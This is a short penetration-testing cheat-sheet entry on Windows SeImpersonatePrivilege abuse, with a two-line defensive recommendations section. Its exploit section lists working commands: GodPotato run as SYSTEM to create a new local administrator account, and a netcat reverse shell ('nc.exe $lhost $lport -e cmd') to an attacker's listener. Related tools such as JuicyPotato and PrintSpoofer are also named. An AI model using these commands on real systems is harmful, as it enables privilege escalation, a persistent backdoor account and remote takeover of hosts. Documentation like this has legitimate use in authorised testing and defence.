SeImpersonatePrivilege Abuse

Table of contents

  1. Exploit
  2. Recommendations

Exploit

Example below using GodPotato. SeImpersonatePrivilege can be also leveraged by JuicyPotato, PrintSpoofer, RoguePotato, and SharpEfsPotato.

# Check if SeImpersonatePrivilege is enabled for the current user.
whoami /priv

# Execute command as NT AUTHORITY/SYSTEM.
.\GodPotato.exe -cmd "net user $username $password /add; net localgroup administrators $username /add"
.\GodPotato.exe -cmd "nc.exe $lhost $lport -e cmd"

Recommendations

  • Disable SeImpersonatePrivilege on domain and local users.
  • Enforce EDR on Windows hosts to detect and block GodPotato-like exploits.